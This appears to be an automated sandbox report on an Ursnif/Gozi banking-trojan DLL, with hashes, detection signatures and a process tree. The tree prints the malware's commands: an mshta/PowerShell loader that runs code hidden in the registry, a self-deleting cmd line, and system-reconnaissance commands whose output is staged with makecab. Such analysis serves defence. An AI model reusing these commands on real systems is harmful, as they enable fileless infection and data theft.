Overview

overview

10

Static

static

c9d954b3f1...b6.dll

windows7_x64

10

c9d954b3f1...b6.dll

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    25-11-2020 17:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c9d954b3f1c512e6804fd8f5637b58b6.dll

  • Size

    234KB

  • MD5

    c9d954b3f1c512e6804fd8f5637b58b6

  • SHA1

    b452040d8072117ddbe1adf9e1eab5e4bdb150bd

  • SHA256

    d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3

  • SHA512

    a4e949017016c1cfaa9bdff664c8ee20b2a34fe78788de9a4338ae5ad9a8a2623ccafe6d4584ef4f6cb29bc05dbcb3a71cbcd4051560287fbe74fb5a5738c09b

Score
10/10
gozi_ifsbursnifbankerspywaretrojan

Malware Config

Extracted

Family

ursnif

Attributes
  • dga_base_url

  • dga_crc

    0

  • dga_season

    0

  • dga_tlds

  • dns_servers

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • ServiceHost packer 1 IoCs

    Detects ServiceHost packer used for .NET malware

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Program crash 1 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
    adwarespyware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1067 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 103 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:500
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1412
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 744
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2536
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BFC92168-124C-49FC-1463-668D8847FA11\\\AppXxSip'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BFC92168-124C-49FC-1463-668D8847FA11").ActitLog))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3916
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvpfzcuv\uvpfzcuv.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82DD.tmp" "c:\Users\Admin\AppData\Local\Temp\uvpfzcuv\CSC762E9322FD8847EEA6EF987750CC2060.TMP"
            5⤵
              PID:3212
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige3kt1e\ige3kt1e.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:628
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84E0.tmp" "c:\Users\Admin\AppData\Local\Temp\ige3kt1e\CSC998CA52485224B93909351B159363957.TMP"
              5⤵
                PID:204
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:3924
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B362.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3936
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:936
          • C:\Windows\system32\cmd.exe
            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B362.bi1"
            2⤵
              PID:3864
            • C:\Windows\system32\cmd.exe
              cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:200
              • C:\Windows\system32\systeminfo.exe
                systeminfo.exe
                3⤵
                • Gathers system information
                PID:4052
            • C:\Program Files\Windows Mail\WinMail.exe
              "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
              2⤵
                PID:3408
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:3948
                • C:\Windows\system32\makecab.exe
                  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\742B.bin"
                  2⤵
                    PID:4016
                  • C:\Windows\system32\makecab.exe
                    makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\3F35.bin"
                    2⤵
                      PID:3672
                    • C:\Windows\system32\makecab.exe
                      makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\1289.bin"
                      2⤵
                        PID:1856
                      • C:\Windows\system32\cmd.exe
                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                        2⤵
                          PID:3888
                        • C:\Windows\system32\cmd.exe
                          cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                          2⤵
                            PID:2504
                            • C:\Windows\system32\net.exe
                              net view
                              3⤵
                              • Discovers systems in the same network
                              PID:3684
                          • C:\Windows\system32\cmd.exe
                            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                            2⤵
                              PID:3580
                            • C:\Windows\system32\cmd.exe
                              cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                              2⤵
                                PID:1432
                                • C:\Windows\system32\nslookup.exe
                                  nslookup 127.0.0.1
                                  3⤵
                                    PID:3384
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                  2⤵
                                    PID:2344
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                    2⤵
                                      PID:4016
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist.exe /SVC
                                        3⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1640
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                      2⤵
                                        PID:2792
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                        2⤵
                                          PID:1800
                                          • C:\Windows\system32\driverquery.exe
                                            driverquery.exe
                                            3⤵
                                              PID:2204
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                            2⤵
                                              PID:1620
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                              2⤵
                                                PID:2856
                                                • C:\Windows\system32\reg.exe
                                                  reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                                  3⤵
                                                    PID:904
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                                  2⤵
                                                    PID:3936
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\E8AD.bin1 > C:\Users\Admin\AppData\Local\Temp\E8AD.bin & del C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
                                                    2⤵
                                                      PID:3608
                                                    • C:\Windows\system32\makecab.exe
                                                      makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\8453.bin"
                                                      2⤵
                                                        PID:3548
                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                      1⤵
                                                        PID:3416
                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                        1⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3676
                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3676 CREDAT:82945 /prefetch:2
                                                          2⤵
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1444
                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                        1⤵
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3536
                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3536 CREDAT:82945 /prefetch:2
                                                          2⤵
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3900
                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3536 CREDAT:82952 /prefetch:2
                                                          2⤵
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2120

                                                      Network

                                                      MITRE ATT&CK Enterprise v6

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/812-34-0x000001A57A880000-0x000001A57A91B000-memory.dmp

                                                        Filesize

                                                        620KB

                                                        Download

                                                      • memory/2536-59-0x00000000047A0000-0x00000000047A1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2536-40-0x0000000004260000-0x0000000004261000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3032-30-0x0000000005200000-0x000000000529B000-memory.dmp

                                                        Filesize

                                                        620KB

                                                        Download

                                                      • memory/3032-31-0x00000000052A0000-0x000000000533B000-memory.dmp

                                                        Filesize

                                                        620KB

                                                        Download

                                                      • memory/3032-45-0x0000000005200000-0x000000000529B000-memory.dmp

                                                        Filesize

                                                        620KB

                                                        Download

                                                      • memory/3916-9-0x00007FFE97290000-0x00007FFE97C7C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                        Download

                                                      • memory/3916-10-0x0000021BFB1E0000-0x0000021BFB1E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3916-11-0x0000021BFE440000-0x0000021BFE441000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3916-19-0x0000021BFB1D0000-0x0000021BFB1D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3916-27-0x0000021BFB220000-0x0000021BFB221000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3916-28-0x0000021BFE4C0000-0x0000021BFE55B000-memory.dmp

                                                        Filesize

                                                        620KB

                                                        Download

                                                      • memory/3948-55-0x0000000000206CD0-0x0000000000206CD4-memory.dmp

                                                        Filesize

                                                        4B

                                                        Download